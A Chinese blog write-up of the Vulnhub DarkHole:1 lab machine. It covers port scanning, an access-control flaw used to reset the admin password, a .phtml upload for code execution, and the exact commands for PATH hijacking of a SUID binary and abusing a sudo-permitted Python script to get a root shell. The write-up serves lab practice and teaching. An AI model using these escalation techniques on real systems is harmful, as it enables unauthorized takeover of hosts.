首页 > 其他分享 >Vulnhub: DarkHole:1靶机

Vulnhub: DarkHole:1靶机

时间:2023-06-28 20:22:55浏览次数:35  
标签:bin py 用户 192.168 DarkHole Vulnhub file 靶机 john

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

访问目标web网站,注册用户

image

注册时尝试注册用户名为admin的用户,发现存在该用户

image

image

进入用户后台,利用burp抓包越权修改其他用户的密码

image

image

admin用户密码被修改

image

经过测试,phtml后缀的文件可以上传并且被当成脚本执行

image

image

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

image

执行toto的同时会执行id命令

image

修改环境变量切换到john用户

echo '/bin/bash' > id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

image

在john用户家目录,发现password文件存放john用户的密码

image

查看john用户sudo权限

image

修改file.py提升为root

echo 'import os' > file.py
echo 'os.system("/bin/bash")' >> file.py
sudo -u root /usr/bin/python3 /home/john/file.py

image

标签:bin,py,用户,192.168,DarkHole,Vulnhub,file,靶机,john
From: https://www.cnblogs.com/ctostm/p/17512468.html

相关文章

  • VulnHub_DC-6渗透流程
    DC-6kali:192.168.157.131靶机:192.168.157.150修改host文件,添加192.168.157.150wordy不然解析不了域名信息收集发现是WordPress5.1.1,探测一下用户,使用wpscan对其用户进行枚举wpscan--urlhttp://wordy/--enumerateu另存为user.txt扫一下目录找到登录界面访问http......
  • vulnhub靶场:Thales
    靶场地址:泰雷兹:1~VulnHubkali:172.88.6.144靶场:172.88.6.81 nmap172.88.6.0/24 nmap-T4-sV-P -A172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下 msfconsolesearchtomcat  useauxiliary/scanner/http/t......
  • Vulnhub_Broken_WP
    前言靶机下载地址-->https://www.vulnhub.com/靶机探测nmap-sn192.168.20.0/24192.168.20.140是新出现的ip详细信息扫描nmap-A-p-192.168.20.140这里可以发现nmap已经扫到了一些网站目录,一个说明文件和图片漏洞扫描nmapnmap-p22,80--script=vuln192.168.20.......
  • vulnhub之VulnHub2018_DeRPnStiNK
    一、信息获取1、tcp开放端口获取─$cattcp_open_port.nmap#Nmap7.93scaninitiatedSatJun2416:48:232023as:nmap--min-rate10000-p--oAtcp_open_port192.168.62.198Nmapscanreportfor192.168.62.198Hostisup(0.0014slatency).Notshown:65532clos......
  • vulnhub靶机练习:01-Empire-Lupin-One
    这次用的是OracleVMVirtualBox,避免用vmware出现的问题靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/arp-scan-l  扫描ip kali:172.88.6.144靶场:172.88.6.63/1、扫描ipnmap-A-sV-T4-p-172.88.6.63 1.1尝试访问ip 1.2目录扫描    d......
  • vulnhub靶场搭建
    vulnhub靶场搭建kali虚拟机安装1、更新sudoapt-getupdate2、安装docker.iosudoaptinstalldocker.io3、验证安装docker-v4、安装docker-composepipinstalldocker-compose5、拉取镜像gitclonehttps://github.com/vulhub/vulhub.git6、进行测试cdvulnhub......
  • vulnhub-xxe靶场通关(xxe漏洞续)
    vulnhub-xxe靶场通关(xxe漏洞续)下面简单介绍一个关于xxe漏洞的一个靶场,靶场来源:https://www.vulnhub.com这里面有很多的靶场。靶场环境需要自己下载:https://download.vulnhub.com/xxe/XXE.zip因为是外国的靶场,下载速度有点慢,也可以通过公众号——星光安全,回复“xxe靶场”获得。......
  • 三层靶机内网渗透测试
    三层靶机内网渗透测试信息收集目标ip:192.168.31.145端口信息收集:nmap-A-T4-p- 192.168.31.145开放端口:21/22/80/111/888/3306/8888   操作系统:Liunx分析利用21/22端口--弱口令爆破hydra-vV-lroot-P/usr/share/wordlists/metasploit/password.lst 192.1......
  • Vulnhub: Corrosion:2靶机
    kali:192.168.111.111靶机:192.168.111.131信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.131通过nmap脚本枚举出8080端口存在backup.zip文件,下载后解压发现需要密码,利用john爆破压缩包密码得到密码:@administrator_hi5zip2johnbackup.zip......
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
    Cengbox2识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Cengbox2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......